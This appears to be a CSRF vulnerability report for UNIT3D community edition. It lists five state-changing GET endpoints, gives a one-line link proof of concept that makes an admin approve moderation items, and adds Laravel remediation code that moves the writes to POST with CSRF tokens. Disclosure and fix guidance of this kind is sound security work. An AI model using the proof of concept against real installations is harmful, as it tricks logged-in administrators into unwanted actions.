Cross-Site Request Forgery (CSRF) in hdinnovations/unit3d-community-edition
Status: Valid
Nov 15th 2021
More unprotected endpoints that allow state-changing operations via CSRF, because each performs a write on a plain GET request with no CSRF token check:
1: GET /dashboard/moderation/1/approve
2: GET /requests/1/accept
3: GET /requests/1/reject
4: GET /requests/1/unclaim
5: GET /requests/1/reset
Proof of Concept
<a href="[UNIT3D-URL]/dashboard/moderation/1/approve">CLICK ME!</a>
This vulnerability allows an attacker to trick admin users into accepting, rejecting, unclaiming, or resetting requests, and into approving items in the moderation dashboard, simply by getting them to follow a link while logged in.
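The fix pattern for this class of finding, as an added illustration that is not code from the UNIT3D project: the state change moves from a GET route to a POST route, so Laravel's VerifyCsrfToken middleware (part of the `web` middleware group) validates the `_token` field on every submission. The controller and method names are assumed for the example.

```php
<?php
// routes/web.php style definitions (example only; names are hypothetical)

use Illuminate\Support\Facades\Route;

// VULNERABLE pattern (as in the report): a write operation is triggered by
// a GET request. Any cross-site link or <img src> will perform it with the
// victim's session cookie, and no CSRF token is ever checked on GET.
Route::get('/requests/{id}/accept', [RequestController::class, 'approve'])
    ->middleware('auth');

// HARDENED pattern: the same operation as a POST route. The `web` middleware
// group runs VerifyCsrfToken, which rejects any POST/PUT/PATCH/DELETE whose
// `_token` (or X-CSRF-TOKEN header) does not match the session token,
// so a forged cross-origin form submission fails with HTTP 419.
Route::post('/requests/{id}/accept', [RequestController::class, 'approve'])
    ->middleware('auth')
    ->name('requests.accept');

/*
 * The corresponding view must submit via a form rather than a link.
 * Blade template (example):
 *
 *   <form method="POST" action="{{ route('requests.accept', $request->id) }}">
 *       @csrf
 *       <button type="submit">Accept</button>
 *   </form>
 *
 * `@csrf` renders <input type="hidden" name="_token" value="..."> from the
 * current session, which is what VerifyCsrfToken compares against.
 *
 * Caveat on SameSite cookies as a second layer: Laravel's default
 * config/session.php 'same_site' => 'lax' still sends the session cookie on
 * top-level GET navigations, so it does NOT protect GET endpoints like the
 * ones listed above. Only once the write is on POST does Lax also help.
 */
```

A quick regression check is to grep the route list (`php artisan route:list`) for GET routes whose names or paths contain verbs such as approve, accept, reject, reset, or delete.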